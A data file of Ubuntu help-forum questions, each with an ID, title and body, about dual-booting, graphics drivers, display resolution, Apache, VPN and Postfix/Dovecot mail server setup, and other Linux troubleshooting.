410966	redirect library location in nautilus	i recently bought a new ssd for my laptop , and i will install a dual-boot configuration with windows 8.1 n and ubuntu 13.10 ( amd64 version ) . but since the ssd has a limited amount of storage ( approx . 80 gigabyte left on a 120gb-ssd ) , i have to be effective with that limited space . since ubuntu can read from the windows-partition ( all windows-files are accessible using ubuntu ) , but windows ca n't read from ubuntu 's ext4-partition , i will use the windows-partition for both windows system files and other files such as pictures and local videos , and the ubuntu partition only for system files and installed programs . to the question : is there any way i can redirect the nautiles library folder 's to point to c : /users/windows-user instead of default home/users/ ? . also , the recommended space of ubuntu is 30 gigabyte , but today , my ubuntu system ( wothout other other files ) takes 10 gb , with some programs installed . maybe 20 gigabytes are enough ? but i do n't want to have any problems in the future , with need of repartitioning the drive to increase the amount of space and delete my windows-installation . any thoughts ? thanks in advance . computer : dell latitude d630 , 64-bit compatible . ssd : logitech ssdnow v-300 , 120 gigabyte
410969	what is the role of a bug reporter ?	what is the role of a bug reporter in reporting bugs and after reporting bugs ? when and how can he get out of the bug-related problem ? most people get the benefits of the bug report after the bug is confirmed ; but this does not ensure each and every reporter 's case . for instance , he/she would n't get any benefits of bug report if he/she did n't update his system . so he/she should do something . what are they ?
410972	ubuntu 12.04 x64 hangs on shutdown/reboot	since i 've installed ubuntu 12.04 x64 on wife 's new laptop it 's constantly ( but not always ) hanging on reboot or shutdown . killing x server ( with ctrl+alt+backspace ) has the same issue . sometimes it hangs with only desktop picture shown , but sometimes it prints some information : fsck █ █ util-linux 2.20.1 fsck █ █ util-linux 2.20.1 /dev/sda6 : clean , 319000/4276224 files , 1601835/17089536 blocks /dev/sda7 : clean , 127051/7331840 files , 17528488/29296640 blocks skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles speech-dispatcher disabled ; edit /etc/default/speech-dispatcher saned disabled ; edit /etc/default/saned acpid : starting up with proc fs acpid : 35 rules loaded acpid : waiting for events : event logging is off * chacking battery state ... cpid : exiting checking for running unattended-upgrades : speech-dispatcher disabled ; edit /etc/default/speech-dispatcher [ 1932.475214 ] info : rcu_bh detected stalls on cpus/tasks : { 2 } ( dected by 1 , t=15002 jiffies ) [ 1932.475309 ] info : stall ended before state dump start [ 1982.273623 ] info : rcu_bh detected stalls on cpus/tasks : { 2 } ( dected by 3 , t=15004 jiffies ) [ 1982.273720 ] info : stall ended before state dump start [ 2112.161349 ] info : rcu_bh detected stalls on cpus/tasks : { 2 } ( dected by 1 , t=60008 jiffies ) [ 2112.161453 ] info : stall ended before state dump start the last line couples repeats endlessly with some delay until i force poweroff laptop . i have no idea on what this all means . any help with that ?
410976	android emulator does n't start	my android emulator was working with ubuntu 13.10 x64 till i reinstalled it . i have downloaded java jdk and jre , the newest version of the android development tools for linux x64 , libstdc++6 : i386 and lib32z1 . when i now run my emulator from eclipse , i get a black emulator window with android not loading . i have also tried to run the emulator on command line and this error is showing up : emulator : error : could not load opengles emulation library : lib64openglrender.so : can not open shared object file : no such file or directory emulator : warning : could not initialize opengles emulation , using software renderer . i am confused because nothing else is installed on my ubuntu machine despite updates !
410988	how to intall intel mkl libraries on 13.10 ?	i am having troubles instaling intel mkl libraries on 13.10 . if somebody was able to install it , could he/she help ? mir
410989	resolution not in xrandr and make new resolution permenent ?	i am using a monitor which its native ( optimal ) resolution is 1600*900. but xrandr does n't show any resolution above `` 1024x768 '' . i can change to my native resoution by issuing these 3 commands : xrandr -- newmode `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync xrandr -- addmode vga1 `` 1600x900_60.00 '' xrandr -- output vga1 -- mode `` 1600x900_60.00 '' but i have to do it each time i reboot . i searched the wiki and found i can write an /etc/x11/xorg.conf.d/10-monitor.conf . i wrote this but **it does n't work '' . i do n't know where i am doing wrong ? section `` device '' identifier `` intel i915 '' option `` vga1 '' # '' vga screen '' driver `` intel '' endsection section `` monitor '' identifier `` primary monitor '' modeline `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync option `` preferredmode '' `` 1600x900 '' endsection section `` screen '' identifier `` screen0 '' device `` vga1 '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1600x900_60.00 '' endsubsection endsection also here is the output of my $ > xrandr -q http : //paste.ubuntu.com/6820312/
410991	wipe windows 8 and replace it with ubuntu	i have a hp laptop with pre installed windows 8 , only about 12 months old , i hate it and now something has gone wrong with it and it wont reset as it says the files are missing , i have gone over to using chromebook now , but want to use the laptop for something , how do i remove windows and install ubuntu in its place ? i tried to install already but it wo n't disable the safe boot function . i 'm not all that knowledgeable , but will give it a go as not much to lose as the damn thing is unusable now .
410993	fix a dbus-deamon bug which uses all the processing power	there is a bug in dbus-deamon.bug # 1228321 on launchpad or maybe bug # 680444 . also bug # 261180 on kde and bug # xyz everywhere . it has been reported everywhere a long time ago ( in 2010 on kde ) . it seems that the only solution to this bug is finding the program which forces dbus-deamon to use all the processing power , kill it and restart the system . this works but it has been reported that it generally comes again after few restarts . is there any way to find which program makes dbus malfunction ? is there any permanent solution to this bug ? in my case this started just after installing variety . it was n't getting killed so i uninstalled it . even then dbus was using 100 % power and cores were going to melt ( beyond 100 degree celsius temperatures ) . after few restarts , everything is fine , but i 'm 50.01 % sure the bug will attack again . i 'm not reporting this bug , it 's a really old one , but it seems unfixed .
410997	sim city 4 ( wine ) crashes on key press , not sure why ?	this might not be the place to ask this but it seems more related to ubuntu than wine or sim city . i 've successfully played 6 hours of sim city 4 on playonlinux using wine 1.7.9 through steam . but i started it up today and each and every time i press a key the game crashes out . i just deleted the disk and reinstalled it and the same thing , all i have to do it press esc and it dies ! any ideas how to trouble shoot , running it in debug did n't tell me much ? thanks , noki
411001	ubuntu phone replacing android 2.2.2	is it possible to change my android phone running 2.2.2 to ubuntu ? if not , how can i get ubuntu for android ? thanks
411002	mod_rewrite use in apache 2.4	okay , so there are plenty of threads on how to use mod_rewrite , but i find it seems to work a bit differently in apache 2.4 . i tried this : < directory /var/www/vhosts/example.com > < ifmodule mod_rewrite > rewriteengine on rewritebase /var/www/vhosts/example.com rewriterule ^index\.php $ - [ l ] rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d < /ifmodule > < /directory > this is situated in /etc/apache2/conf-available/httpd.conf/ , and i 've runt sudo a2enconf httpd.conf which worked and enabled it , but it does n't want to work anyways.. i tried it without the directory bit , i tried calling it mod_rewrite.c which wordpress suggests , but neither of the above seems to work . i also tried it with the directory tag but without ifmodule , which for obvious reasons ended up with apache not starting.. and yes , i restart apache between every attempt . is there a new trick to this in apache 2.4 that i do n't know if ? any help appreciated .
411006	unity on 13.10 : ctrl + alt resizes the window . how to disable this ?	i run an almost fresh install ubuntu 13.10 with unity . as soon as i press ctrl + alt ( on the left part of the keyboard ) , current window resizes to the size of 1 / 4 of the screen . how do i disable this behavior ?
411007	making vpn server	i am trying to make a vpn server out of my ubuntu vps . i followed the answer given here : create vpn server using the ubuntu vps but when i tried to connect it from win7 . i got error 619 :
411008	over heating mobile intel速 gm45 express chipset in ubuntu	my laptop over heated in ubuntu , after installing the graphic card even the graphic card takes over heated about 60c . what is the problem ? what should i do ?
411010	hd bad blocks : is there a way to repair them ?	during the last month ubuntu starts having some problems : it shuts down suddenly without any apparent reason.. i figured out that the problem is in the hard disk , if i run this command : $ sudo badblocks -sv -b 512 /dev/sda i get 24 bad blocks all in the linux partition ( i have windows in another one and it does not have the same problem ) . the question is if there is a way ( different from changing the disk ) for avoiding this shutting down . maybe isolating the bad blocks ?
411012	i installed another linux version next to ubuntu , now ubuntu has problems !	i tried using boot repair . but i 'm still having trouble . when ubuntu boots , it is in the wrong resolution , and i ca n't get my wireless network up . here is the boot repair record : http : //paste.ubuntu.com/6820513 i think i might need to re-install my linux headers , but not sure how . john @ john : ~ $ sudo su [ sudo ] password for john : root @ john : /home/john # apt-get remove -- purge -- force-yes autoremove reading package lists ... done building dependency tree reading state information ... done e : unable to locate package autoremove root @ john : /home/john # apt-get remove reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-image-3.2.0-56-generic linux-image-3.2.0-57-generic linux-image-3.2.0-58-generic linux-image-3.5.0-44-generic linux-image-3.9.0-030900-generic 0 upgraded , 0 newly installed , 5 to remove and 3 not upgraded . 5 not fully installed or removed . after this operation , 774 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 203588 files and directories currently installed . ) removing linux-image-3.2.0-56-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-56-generic /boot/vmlinuz- 3.2.0-56-generic update-initramfs : deleting /boot/initrd.img-3.2.0-56-generic run-parts : executing /etc/kernel/postrm.d/zz-extlinux 3.2.0-56-generic /boot/vmlinuz- 3.2.0-56-generic p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.5.0-43-generic ... p : writing config for windows 7 ( loader ) on /dev/sdb1 ... p : writing config for windows 7 ( loader ) on /dev/sdb2 ... p : installing debian theme ... cp : can not stat `/usr/share/syslinux/themes/debian- squeeze/extlinux/memtest.bin ' : no such file or directory run-parts : /etc/kernel/postrm.d/zz-extlinux exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-56- generic.postrm line 328. dpkg : error processing linux-image-3.2.0-56-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.2.0-57-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-57-generic /boot/vmlinuz- 3.2.0-57-generic update-initramfs : deleting /boot/initrd.img-3.2.0-57-generic run-parts : executing /etc/kernel/postrm.d/zz-extlinux 3.2.0-57-generic /boot/vmlinuz- 3.2.0-57-generic p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.5.0-43-generic ... p : writing config for windows 7 ( loader ) on /dev/sdb1 ... p : writing config for windows 7 ( loader ) on /dev/sdb2 ... p : installing debian theme ... cp : can not stat `/usr/share/syslinux/themes/debian- squeeze/extlinux/memtest.bin ' : no such file or directory run-parts : /etc/kernel/postrm.d/zz-extlinux exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-57- generic.postrm line 328. dpkg : error processing linux-image-3.2.0-57-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.2.0-58-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-58-generic /boot/vmlinuz-3.2.0-58-generic update-initramfs : deleting /boot/initrd.img-3.2.0-58-generic run-parts : executing /etc/kernel/postrm.d/zz-extlinux 3.2.0-58-generic /boot/vmlinuz-3.2.0-58-generic p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.5.0-43-generic ... p : writing config for windows 7 ( loader ) on /dev/sdb1 ... p : writing config for windows 7 ( loader ) on /dev/sdb2 ... p : installing debian theme ... cp : can not stat `/usr/share/syslinux/themes/debian- squeeze/extlinux/memtest.bin ' : no such file or directory run-parts : /etc/kernel/postrm.d/zz-extlinux exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-58- generic.postrm line 328. dpkg : error processing linux-image-3.2.0-58-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.5.0-44-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-44-generic /boot/vmlinuz-3.5.0-44-generic update-initramfs : deleting /boot/initrd.img-3.5.0-44-generic run-parts : executing /etc/kernel/postrm.d/zz-extlinux 3.5.0-44-generic /boot/vmlinuz-3.5.0-44-generic p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.5.0-43-generic ... p : writing config for windows 7 ( loader ) on /dev/sdb1 ... p : writing config for windows 7 ( loader ) on /dev/sdb2 ... p : installing debian theme ... cp : can not stat `/usr/share/syslinux/themes/debian- squeeze/extlinux/memtest.bin ' : no such file or directory run-parts : /etc/kernel/postrm.d/zz-extlinux exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.5.0-44- generic.postrm line 328. dpkg : error processing linux-image-3.5.0-44-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already removing linux-image-3.9.0- 030900-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.9.0-030900-generic /boot/vmlinuz-3.9.0-030900-generic update-initramfs : deleting /boot/initrd.img-3.9.0-030900-generic run-parts : executing /etc/kernel/postrm.d/zz-extlinux 3.9.0-030900-generic /boot/vmlinuz-3.9.0-030900-generic p : checking for extlinux directory ... found . p : writing config for /boot/vmlinuz-3.5.0-43-generic ... p : writing config for windows 7 ( loader ) on /dev/sdb1 ... p : writing config for windows 7 ( loader ) on /dev/sdb2 ... p : installing debian theme ... cp : can not stat `/usr/share/syslinux/themes/debian- squeeze/extlinux/memtest.bin ' : no such file or directory run-parts : /etc/kernel/postrm.d/zz-extlinux exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.9.0-030900- generic.postrm line 328. dpkg : error processing linux-image-3.9.0-030900-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-56-generic linux-image-3.2.0-57-generic linux-image-3.2.0-58-generic linux-image-3.5.0-44-generic linux-image-3.9.0-030900-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
411015	can not mount android phone as usb in lubuntu 12.04	i am trying to mount my sony xperia phone as a usb mass storage device . i open terminal and type : lsusb bus 001 device 004 : id 0fce:0192 sony ericsson mobile communications ab bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x38473846 device boot start end blocks id system /dev/sda1 * 63 976751999 488375968+ 7 hpfs/ntfs/exfat sudo mkdir /media/android sudo mount /dev/sda1 /media/android mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . any ideas as to what the problem is ?
411016	taskbar and panel icons disappearing	on ubuntu 13.10 , after installing virtualbox guest additions , my taskbar and panel icons disappeared and do not come back after a restart .
411020	install ubuntu 13.10 on external firewire hard drive	i think i installed ubuntu 13.10 on my external firewire hard drive ( lacie rugged triple ) successfully , but i do n't see any way to boot it . how can i solve this ? i already have mac os x lion and windows 7 ultimate installed on my laptop . links that may help you http : //support.apple.com/kb/ht2699 http : //wdc.custhelp.com/app/answers/detail/a_id/1787/~/list-of-mac-bootable-wd-external-drives-and-how-to-format-them-to-install-on
411021	mouse scrolling is not working	i have installed lxde desktop in ubuntu 12.4 , but the mouse scrolling is not working . can that be a problem with drivers ? and when i minimize a window it does n't show in the task bar , how can i make it visible ?
411026	looking for command line help	i am using a dd image and i am trying to identify the byte value at offset 56 and offset 57 of the file system 's superblock . the image is an ext3 image . i am unsure what the appropriate command would be ? it is for school and i am learning the command line . thanks in advance !
411027	greek language voice recognition	does anyone know whether there exists a voice recognition tool for the greek language on ubuntu 13.04 ?
411029	ca n't install graphics driver on ubuntu 13.04	i installed ubuntu 13.04 but afterwards i could n't install amd radeon hd 7670 graphics driver . what can be the cause of the problem ?
411030	identify all deleted files and folders in the command line	i have an ext3 image that i am working on for school . i am trying to identify all deleted files and folders , including the full path names and inode numbers of these files/folders . i believe i need to use the blkcat command but i am unsure of the parameters that i need ?
411031	available computer-assisted translation ( cat ) software for ubuntu	does anyone know any good ( if any ) computer-assisted translation ( cat ) software for ubuntu 13.10 ?
411034	kubuntu natural scrolling touchpad only but not for mouse	kde has the option to `` reverse scroll direction '' , which is great when i 'm using my touchpad , however , i equally use a mouse quite often on my laptop but when it comes to a mouse , i prefer the normal scrolling . is this possible at all ? if not , where do i start if i want to implement this myself ?
411036	`` command not found '' when running a program	i downloaded the citrix receiver for linux 13.0 ( i 'm running ubuntu 13.10 64bits ) from http : //www.citrix.com/downloads/citrix-receiver/linux/receiver-for-linux-130.html . i unpacked it using alien , but when i try to open the receiver from the command line ( as explained in the documentation ) by typing /opt/citrix/icaclient/selfservice it tells me `` command not found '' . i tried to navigate to the folder from the graphical interface : i can see the file ( which is of type application/x-executable ) but when i double click on it nothing happens ! i tried to right click and check the permissions : the executable case is ticked but it tells me that i can not modify anything because i am not the owner ... i also tried chmod from command line but nothing changes . does anybody know why this happens ? ?
411037	no proprietary drivers showing up in system manager ubuntu 13.10	i go to the system manager to install proprietary drivers for my nvidia geforce 330m graphics card but no packages pop-up.. i need them very much for games and such.. any help is greatly appreciated !
411040	why is my radeon hd 4330 slow on free drivers ?	this is an old laptop i decided to get running again and i found out that the radeon hd mobility 4330 gpu has n't been supported by amd 's catalyst driver for a while now . so instead , i 'm trying out the free drivers . https : //help.ubuntu.com/community/radeondriver claims that it should have full acceleration , but that simply does n't seem to be the case . any game at all will run slow as molasses ( < 0.5 fps ) . i 've lshw 'd to check if it 's even using the driver , which outputs this : configuration : driver=radeon latency=0 so obviously it should be working . but it is n't . could anyone tell me what 's going on and how to fix it ? or is the hd mobility 4330 simply a hopeless case ? i 've already tried the oibaf ppa , which seemed to have no effect .
411041	xrandr fails to change refreshrate	ubuntu unity has issues allowing my haswell intel hd4600 graphics card to change refreshrate with xrandr . xrandr -- screen 0 -- output hdmi2 -- mode 0xd1 should change the refreshrate to 24hz , running the command issues a resync on my display , but it stays at 60hz ( mode 0x48 ) the issue is related to unity , example fluxbox and lxde does not have the issue . none of the modes below 50hz will be accepted and it will revert to mode 0x48 60hz
411042	toshiba satellite c55d-a5392 wo n't boot install or try ubuntu	downloaded 64 bit iso for 13.10 . whether burned to dvd or on bootable usb it 's the same result . the laptop boots to the grub try/install/oem/check menu . when try or install is chosen the screen changes to the ubuntu logo with the animated dots below it and then animates for a while . after that the screen goes blank and stays that way . attempts to bring up console with alt-f1 do n't work . modified boot options and removed splash and quiet , watching the boot process i see nothing unusual , until the system apparently starts x and the screen goes and stays blank . i ran check on the usb stick and it says the ubuntu system on there checks out . i 've tried turning off uefi boot , but then neither usb nor dvd boot at all . secure boot is off ( has been the whole time ) . so far i 'm stuck booting into windows 8.1 or not at all it seems . right now it feels like my options are to use ubuntu from virtualbox within windows or just return the computer . any thoughts or advice ?
411045	problem with program running in code : :blocks	i installed code blocks 12.11 from ubuntu software center but it is n't working . when i run a program , it says `` permission denied '' even if my program is totally ok. what could be the issue ?
411046	gedit : execute line in embedded plugin	is there a way to execute a line from within gedit to the embedded terminal in the bottom panel ? i am aware of the external tools plugin , but i could not find a working code to send the command from the line to the embedded terminal . i tried with this code # ! /bin/sh echo `` $ gedit_current_line '' but this would only send the code to the shell output and not to the terminal . thanks , mat ** edit ** here you can see the embedded terminal that i mean !
411047	ca n't install any new software on eclipse ( indigo )	i am not able to download any plug-ins or other software add-ons on eclipse ( indigo ) . eclipse was downloaded from the software centre without any problem and i 'm running 12.04 lts . the marketplace was not pre-installed , so i went to download it from the indigo update site and got the following error : then i also tried to download the desired plug-in directly from the website cutting out the need for the marketplace but that too gave me the same error . it does n't seem to find anything . has anyone experienced this and found a solution ?
411048	how do i link my internal ip to my external ip ?	let 's say my internal ip is 192.168.0.1 and my external is 2.222.333.444 1.222.333.444 is dynamic and monitered everytime it changes to the hostname www.website.com i want to link my external ip so that when i connect the hostname , it goes : www.website.com > 2.222.333.444 > 192.168.0.1
411049	64 bit ubuntu studio version for intel pc	is the `` ubuntustudio-12.04.3-dvd-i386.iso '' file 64 bit or 32 bit ? if i have to download 64 bit version for my intel pc ( which has a 64 bit processor ) , which one should i download ?
411052	how to make a script that backup system in ubuntu 12.04 ?	i need a script that when i execute it , it will backup the system to a specific folder ( destination ) . i 'd also like to exclude some files .
411057	postfix dovecot sasl authentication not enabled/working ubuntu 12.04 server	i set-up postfix running with dovecot with sasl support with virtual mailboxes in a postgresql database and amavis clamav and spamassassin all working together working = i can send and receive email to both internal and external ( google ) accounts . when the email is received it is stored in virtual mailbox -- /mwdmail/mbox/example.com/test @ example.com/ not working - i can not telnet to port 25 from an external network - i get `` connection refused '' nor do i see auth login when i succesfully telnet locally to port 25 how do i get dovecot sasl working ? below are my settings : my router and ufw firewall are open on ports 80 , 433 , 25 , 110 , 143 , 465 , 587 , 993 and 995 the postfix version is 2.11.0 postconf - m ( below ) btree cidr environ fail hash internal memcache nis pcre pgsql proxy regexp socketmap static tcp texthash unix postconf - a = dovecot postconf - n below : -- my domain name has been changed to example.com for privacy alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes command_directory = /usr/sbin config_directory = /etc/postfix content_filter = amavis : [ 127.0.0.1 ] :10024 daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix disable_vrfy_command = yes dovecot_destination_recipient_limit = 1 enable_original_recipient = no header_checks = regexp : /etc/postfix/header_checks inet_interfaces = all inet_protocols = ipv4 local_recipient_maps = $ virtual_mailbox_maps local_transport = virtual mail_owner = mwdpost mailbox_size_limit = 0 mailq_path = /usr/bin/mailq manpage_directory = /usr/local/man mydestination = example.com , localhost.com , localhost mydomain = example.com myhostname = example.com mynetworks = 192.168.0.0/24 , 127.0.0.0/8 mynetworks_style = host myorigin = $ mydomain newaliases_path = /usr/bin/newaliases queue_directory = /var/spool/postfix readme_directory = no recipient_delimiter = + relay_domains = proxy : pgsql : /etc/postfix/pgsql/relay_domains.cf relayhost = setgid_group = mwdpdrop smtp_tls_security_level = may smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtp_use_tls = yes smtpd_banner = $ myhostname esmtp $ mail_name smtpd_client_restrictions = permit_sasl_authenticated , reject_rbl_client zen.spamhaus.org , reject_rbl_client sbl.spamhaus.org , reject_rbl_client blackholes.easynet.nl smtpd_delay_reject = yes smtpd_helo_required = yes smtpd_relay_restrictions = reject_sender_login_mismatch , permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_authenticated_header = yes smtpd_sasl_local_domain = $ myhostname smtpd_sasl_path = private/auth smtpd_sasl_security_options = noanonymous smtpd_sasl_tls_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_sender_login_maps = hash : /etc/postfix/sasl/controlled_envelope_senders smtpd_sender_restrictions = permit_sasl_authenticated , reject_unknown_sender_domain , permit_mynetworks smtpd_tls_auth_only = yes smtpd_tls_cert_file = /etc/ssl/certs/ssl-mail.pem smtpd_tls_key_file = /etc/ssl/private/ssl-mail.key smtpd_tls_loglevel = 1 smtpd_tls_mandatory_ciphers = medium smtpd_tls_mandatory_protocols = sslv3 , tlsv1 smtpd_tls_received_header = yes smtpd_tls_security_level = may smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes tls_random_source = dev : /dev/urandom virtual_alias_maps = proxy : pgsql : /etc/postfix/pgsql/virtual_alias_map.cf virtual_gid_maps = static:3205 virtual_mailbox_base = /mwdmail/mbox virtual_mailbox_domains = proxy : pgsql : /etc/postfix/pgsql/virtual_domain_map.cf virtual_mailbox_limit = 512000000 virtual_mailbox_maps = proxy : pgsql : /etc/postfix/pgsql/virtual_mailbox_map.cf virtual_minimum_uid = 3205 virtual_transport = lmtp : unix : private/dovecot-lmtp virtual_uid_maps = static:3205 postfix master.cf ( postconf -m ) file = # smtp on port 25 , unencrypted . smtp inet n - - - - smtpd -v smtpd pass - - - - - smtpd -v # smtp with tls on port 587. submission inet n - - - - smtpd -v -o smtpd_tls_security_level=encrypt -o smtpd_sasl_auth_enable=yes -o smtpd_sasl_type=dovecot -o smtpd_sasl_path=private/auth -o smtpd_sasl_security_options=noanonymous -o smtpd_sasl_local_domain= $ myhostname -o smtpd_client_restrictions=permit_sasl_authenticated , reject -o smtpd_sender_login_maps=hash : /etc/postfix/sasl/controlled_envelope_senders # -o smtpd_sender_login_maps=hash : /etc/postfix/virtual -o smtpd_sender_restrictions=reject_sender_login_mismatch -o smtpd_recipient_restrictions=reject_non_fqdn_recipient , reject_unknown_recipient_domain , permit_sasl_authenticated , reject # smtp over ssl on port 465. smtps inet n - - - - smtpd -v -o syslog_name=postfix/smtps -o smtpd_tls_wrappermode=yes -o smtpd_sasl_auth_enable=yes -o smtpd_tls_auth_only=yes -o smtpd_client_restrictions=permit_sasl_authenticated , reject_unauth_destination , reject -o smtpd_sasl_security_options=noanonymous , noplaintext -o smtpd_sasl_tls_security_options=noanonymous # 628 inet n - - - - qmqpd pickup fifo n - - 60 1 pickup -o content_filter= -o receive_override_options=no_header_body_checks cleanup unix n - - - 0 cleanup qmgr fifo n - n 300 1 qmgr # qmgr fifo n - n 300 1 oqmgr tlsmgr unix - - - 1000 ? 1 tlsmgr rewrite unix - - - - - trivial-rewrite bounce unix - - - - 0 bounce defer unix - - - - 0 bounce trace unix - - - - 0 bounce verify unix - - - - 1 verify flush unix n - - 1000 ? 0 flush proxymap unix - - n - - proxymap proxywrite unix - - n - 1 proxymap smtp unix - - - - - smtp relay unix - - - - - smtp # -o smtp_helo_timeout=5 -o smtp_connect_timeout=5 showq unix n - - - - showq error unix - - - - - error retry unix - - - - - error discard unix - - - - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - - - - lmtp anvil unix - - - - 1 anvil scache unix - - - - 1 scache # maildrop . see the postfix maildrop_readme file for details . # also specify in main.cf : maildrop_destination_recipient_limit=1 # dovecot unix - n n - - pipe flags=drhu user=mwdvm : mwdvm argv=/usr/bin/vendor_perl/spamc -f -e /usr/lib/dovecot/deliver -f $ { sender } -d $ { recipient } uucp unix - n n - - pipe flags=fqhu user=uucp argv=uux -r -n -z -a $ sender - $ nexthop ! rmail ( $ recipient ) # # other external delivery methods . # ifmail unix - n n - - pipe flags=f user=ftn argv=/usr/lib/ifmail/ifmail -r $ nexthop ( $ recipient ) bsmtp unix - n n - - pipe flags=fq . user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t $ nexthop -f $ sender $ recipient scalemail-backend unix - n n - 2 pipe flags=r user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store $ { nexthop } $ { user } $ { extension } mailman unix - n n - - pipe flags=fr user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py $ { nexthop } $ { user } # the next two entries integrate with amavis for anti-virus/spam checks . amavis unix - - - - 3 smtp -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -o disable_dns_lookups=yes -o max_use=20 127.0.0.1:10025 inet n - - - - smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_delay_reject=no -o smtpd_client_restrictions=permit_mynetworks , reject -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks , reject -o smtpd_data_restrictions=reject_unauth_pipelining -o smtpd_end_of_data_restrictions= -o mynetworks=192.168.0.0/32,127.0.0.0/8 # -o mynetworks=0.0.0.0 -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o smtpd_client_connection_count_limit=0 -o smtpd_client_connection_rate_limit=0 -o receive_override_options=no_header_body_checks , no_unknown_recipient_checks # # # # # # # # # # # # # # # # # integration with dovecot - hand mail over to it for local delivery , and # run the process under the vmail user and mail group . dovecot unix - n n - - pipe flags=drhu user=mwdvm : mwdvm argv=/usr/lib/dovecot/dovecot-lda -d $ ( recipient ) update anders klaer - thanks for the update and tips ! added smtpd line in master.cf and reloaded postfix , but when i telnet to port 25 both to localhost and to my internal ip address from another machine on the same network , the auth login ( sasl `` enabled '' ) code is not there . see mail.log below ... . jan 28 07:41:54 example spamd [ 1860 ] : spamd : server hit by sighup , restarting jan 28 07:41:54 example spamd [ 1860 ] : spamd : child [ 1864 ] killed successfully : interrupted , signal 2 ( 0002 ) jan 28 07:41:54 example spamd [ 1860 ] : spamd : child [ 1863 ] killed successfully : interrupted , signal 2 ( 0002 ) jan 28 07:41:54 example spamd [ 1860 ] : logger : removing stderr method jan 28 07:41:54 example postfix/pickup [ 15760 ] : c407622208b : uid=0 from= < root > jan 28 07:41:55 example postfix/cleanup [ 16769 ] : c407622208b : message-id= < 20140128124154.c407622208b @ example.com > jan 28 07:41:55 example postfix/qmgr [ 2413 ] : c407622208b : from= < root @ example.com > , size=1042 , nrcpt=1 ( queue active ) jan 28 07:41:55 example postfix/trivial-rewrite [ 16772 ] : warning : do not list domain example.com in both mydestination and virtual_mailbox_domains jan 28 07:41:55 example postfix/virtual [ 16775 ] : c407622208b : to= < mwdadm @ example.com > , relay=virtual , delay=0.78 , delays=0.54/0.09/0/0.15 , dsn=2.0.0 , status=sent ( delivered to maildir ) jan 28 07:41:55 example postfix/qmgr [ 2413 ] : c407622208b : removed jan 28 07:41:59 example spamd [ 16768 ] : spamd : server started on port 783/tcp ( running version 3.3.2 ) jan 28 07:41:59 example spamd [ 16768 ] : spamd : server pid : 16768 jan 28 07:41:59 example spamd [ 16768 ] : spamd : server successfully spawned child process , pid 16780 jan 28 07:42:00 example spamd [ 16768 ] : spamd : server successfully spawned child process , pid 16781 jan 28 07:42:00 example spamd [ 16768 ] : prefork : child states : is jan 28 07:42:00 example spamd 